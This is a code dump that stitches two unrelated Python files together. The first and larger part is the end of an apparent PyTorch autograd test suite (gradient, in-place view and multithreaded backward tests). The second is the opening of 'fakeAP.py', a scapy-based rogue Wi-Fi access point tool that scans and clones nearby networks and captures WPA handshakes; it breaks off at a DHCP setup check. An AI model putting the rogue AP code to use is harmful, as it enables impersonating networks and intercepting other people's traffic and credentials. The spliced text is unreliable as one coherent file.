with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.testing.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is an output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
@slowTest
def test_lu_backward(self, device):
def run_test(*sizes):
x = torch.rand(*sizes, device=device, dtype=torch.double).requires_grad_(True)
gradcheck(lambda x: x.lu(get_infos=True), x)
gradgradcheck(lambda x: x.lu(get_infos=True), x)
gradcheck(lambda x: x.lu(get_infos=False), x)
gradgradcheck(lambda x: x.lu(get_infos=False), x)
# there is no pivot-less LU factorization on CPU
if x.device.type == 'cuda':
gradcheck(lambda x: x.lu(pivot=False, get_infos=True), x)
gradgradcheck(lambda x: x.lu(pivot=False, get_infos=True), x)
gradcheck(lambda x: x.lu(pivot=False, get_infos=False), x)
gradgradcheck(lambda x: x.lu(pivot=False, get_infos=False), x)
run_test(3, 3)
run_test(3, 3, 3)
run_test(3, 3, 3, 3)
run_test(5, 5)
run_test(3, 5, 5)
run_test(3, 3, 5, 5)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=(args))
p.start()
threads.append(p)
for p in threads:
p.join()
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c])
torch.autograd.gradcheck(fn, [inp_c, inp_r])
for test in method_tests():
add_test(*test)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
fakeAP.py | #!/usr/bin/env python
import os
from subprocess import Popen, PIPE
import time
import sys
import re
import signal
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
from threading import Thread, Lock
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
lock = Lock()
DN = open(os.devnull, 'w')
APs = {} # for listing APs
chan = 0 # for channel hopping Thread
count = 0 # for channel hopping Thread
forw = '0\n' # for resetting ip forwarding to original state
ap_mac = '' # for sniff's cb function
err = None # check if channel hopping is working
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--channel", help="Choose the channel for the fake AP. Default is channel 6")
parser.add_argument("-w", "--wpa", help="Start the fake AP with WPA beacon tags and capture handshakes in fakeAPlog.cap file", action="store_true")
parser.add_argument("-e", "--essid", help="Choose the ESSID for the fake AP. Default is 'Free Wifi'. Wrap in quotes if it is more than 1 word: -e 'Free Wifi'")
parser.add_argument("-t", "--targeting", help="Will print a list of APs in range and allow you to copy their settings except for the encryption which by default will be open", action="store_true")
return parser.parse_args()
###############
# AP TARGETING
###############
def channel_hop(mon_iface):
global chan, err
while 1:
try:
err = None
if chan > 11:
chan = 0
chan = chan+1
channel = str(chan)
iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE)
for line in iw.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
with lock:
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n \
Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n \
from the network if you have not already\n'
break
time.sleep(1)
except KeyboardInterrupt:
sys.exit()
def target_APs():
os.system('clear')
if err:
print err
print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below'
print 'num ch ESSID'
print '---------------'
for ap in APs:
print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W
def copy_AP():
copy = None
while not copy:
try:
copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ')
copy = int(copy)
except Exception:
copy = None
continue
channel = APs[copy][0]
essid = APs[copy][1]
if str(essid) == "\x00":
essid = ' '
mac = APs[copy][2]
return channel, essid, mac
def targeting_cb(pkt):
global APs, count
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
try:
ap_channel = str(ord(pkt[Dot11Elt:3].info))
except Exception:
return
essid = pkt[Dot11Elt].info
mac = pkt[Dot11].addr2
if len(APs) > 0:
for num in APs:
if essid in APs[num][1]:
return
count += 1
APs[count] = [ap_channel, essid, mac]
target_APs()
###################
# END AP TARGETING
###################
def get_isc_dhcp_server():
if not os.path.isfile('/usr/sbin/dhcpd'):
